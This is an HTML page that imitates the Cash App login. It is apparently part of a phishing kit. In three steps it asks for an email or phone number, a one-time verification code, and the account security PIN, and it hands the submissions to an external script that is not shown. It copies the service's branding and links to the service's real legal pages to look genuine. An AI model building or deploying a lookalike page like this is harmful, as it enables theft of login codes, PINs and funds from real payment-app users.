<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cash Login</title>
    <link rel="stylesheet" href="index.css">
    <link rel="icon" href="./images/cash logo.jpg">
</head>
<body>
    <div class="nav">
        <img src="./images/cash logo.jpg" alt="Cash Logo">
        <h2>Cash App</h2>
    </div>

    <div id="login-form">
        <h2>Log in<br><span class="PorE">Enter your phone number or Email.</span></h2>
        <form id="loginForm">
            <input type="email" id="email" name="email" placeholder="Email Address">
            <span class="or-text">OR</span>
            <input type="text" name="number" id="number" placeholder="Mobile Number">
            <button type="submit">Next</button>
        </form>
    </div>
    
    <div id="otp-form">
        <p>Enter the Code you have for the Phone Number or Email Address Provided</p>
        <form id="otpForm">
            <input type="text" id="otp" name="otp" required placeholder="Code">
            <button type="submit">Verify</button>
        </form>
    </div>

    <div id="ath-form">
        <h2>Enter your account Security Pin: </h2>
        <form id="athForm">
            <input type="text" id="ath" name="ath" placeholder="P-I-N">
            <button type="submit">Submit</button>
        </form>
    </div>


    <footer>
        <p>By entering and clicking Continue, you agree to the <a href="https://cash.app/legal/gb/en-gb/tos">Terms</a>, <a href="https://squareup.com/gb/en/legal/general/sign">E-Sign Consent</a>, & <a href="https://cash.app/legal/gb/en-gb/privacy">Privacy Policy</a>.</p>
    </footer>

    <script src="./script.js"></script>
</body>
</html>
